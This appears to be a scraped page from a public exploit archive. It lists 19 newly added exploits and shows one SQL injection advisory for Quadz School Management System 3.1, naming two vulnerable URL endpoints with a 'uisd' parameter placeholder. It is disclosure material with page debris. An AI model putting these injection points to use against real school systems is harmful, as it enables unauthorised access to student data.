8b6bfd7f93
19 new exploits Cimetrics BACstac 6.2f - Privilege Escalation Cimetrics BACnet Explorer 4.0 - XML External Entity Injection SonicDICOM PACS 2.3.2 - Cross-Site Scripting SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin) SonicDICOM PACS 2.3.2 - Privilege Escalation Kodi 17.1 - Arbitrary File Disclosure WhizBiz 1.9 - SQL Injection TI Online Examination System 2.0 - SQL Injection Viavi Real Estate - SQL Injection Viavi Movie Review - 'id' Parameter SQL Injection Viavi Product Review - 'id' Parameter SQL Injection Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection Joomla! Component Vik Booking 1.7 - SQL Injection Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection
19 lines
No EOL
683 B
Text
Executable file
19 lines
No EOL
683 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Quadz School Management System v3.1 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 12.02.2017
|
|
# Vendor Homepage: http://awardcorporation.com/
|
|
# Software Buy: https://codecanyon.net/item/quadz-school-management-system/10452009
|
|
# Demo: http://mass.awardcorporation.com/
|
|
# Version: 3.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# Login as student user
|
|
# http://localhost/[PATH]/index.php/sclass/ownClassRoutin?uisd=[SQL]
|
|
# http://localhost/[PATH]/index.php/suggestion/own_suggestion?uisd=[SQL]
|
|
# # # # # |